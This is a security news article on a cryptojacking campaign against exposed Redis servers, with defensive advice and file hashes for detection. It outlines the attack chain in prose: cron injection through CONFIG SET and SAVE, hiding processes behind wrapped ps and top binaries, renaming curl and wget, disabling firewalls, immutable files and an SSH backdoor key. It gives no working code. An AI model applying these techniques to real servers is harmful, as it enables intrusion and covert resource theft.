Redis Servers Targeted in Sophisticated Cryptojacking Attack to Deploy Miners and Bypass Security

A new analysis reveals that tens of thousands of Redis servers worldwide remain vulnerable to an advanced cryptojacking campaign orchestrated by the threat actor TA-NATALSTATUS, which has evolved far beyond simple cryptocurrency mining to establish persistent, stealthy infrastructure takeovers.

The campaign exploits exposed Redis instances to deploy sophisticated malware that hides processes, obfuscates commands, and maintains long-term persistence through rootkit-like techniques.

Global Scale of Vulnerability Exposes Critical Infrastructure Gaps

The threat landscape reveals alarming exposure rates across major economies, with over 17% of Redis servers in the United States remaining unauthenticated.

In comparison, European nations face even higher risk levels: 33% in Germany, 27% in the United Kingdom, and 41% in Finland. This widespread misconfiguration provides TA-NATALSTATUS with a massive attack surface, enabling automated scanning campaigns that leverage legitimate Redis commands rather than complex exploits.

The attack methodology exploits the “root by inheritance” technique, where Redis servers running with root privileges allow attackers to manipulate configuration settings using CONFIG SET and SAVE commands to inject malicious cron jobs directly into /var/spool/cron/root.

This approach bypasses traditional privilege escalation by inheriting administrative access from the misconfigured service itself.

Advanced Evasion Techniques Transform Commodity Attacks

What distinguishes TA-NATALSTATUS from typical cryptojacking operations is its sophisticated anti-detection arsenal.

The malware employs process hijacking by renaming system binaries like ps and top to their .original versions, then replacing them with malicious wrappers that filter out their mining processes (httpgd) from administrative visibility.

Additionally, they rename standard download tools curl and wget to cd1 and wd1 respectively, evading security products that monitor for malicious file transfers.

The campaign implements a four-stage lifecycle beginning with systemic sabotage that disables SELinux and firewalls, followed by installation of scanning tools like masscan and pnscan for lateral movement.

The third stage transforms compromised hosts into distributed scanning nodes using shard-based IPv4 address space coverage, while the final persistence stage employs chattr +i commands to create immutable files that resist deletion even by root users.

Comprehensive Defense Strategy Required

Organizations must implement immediate Redis hardening measures, including strong authentication, network isolation through bind 127.0.0.1 configurations, and regular monitoring for suspicious cron jobs containing /dev/null redirections.

Detection efforts should focus on identifying hijacked binaries, immutable files with lsattr, and the distinctive SSH backdoor key comment “uc1” that provides persistent remote access.

The campaign’s extensive kill list targeting rival malware families like Kinsing and DDG demonstrates the competitive nature of the cryptojacking ecosystem. It underscores the need for comprehensive security monitoring beyond traditional antivirus solutions.

File Hashes and Names

SHA256 HashFile Name
58eeceb920a460a5f389acb23e5f8d86c3391788f9c9f5a4b396e3f4f84782c3Dat file
04ae5583ebb88d197f203da92cbc17e5deedd2dc2297b30713ffe697102766b8rs.sh
254d0672515295890354a58cb6f83758e8eceee9bb5b7c5be08813496e59f24andt.sh
f0ff790b0eb3479ab90889223b88826be95051a7170285774b4a06b6d34d0771nnt.sh

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here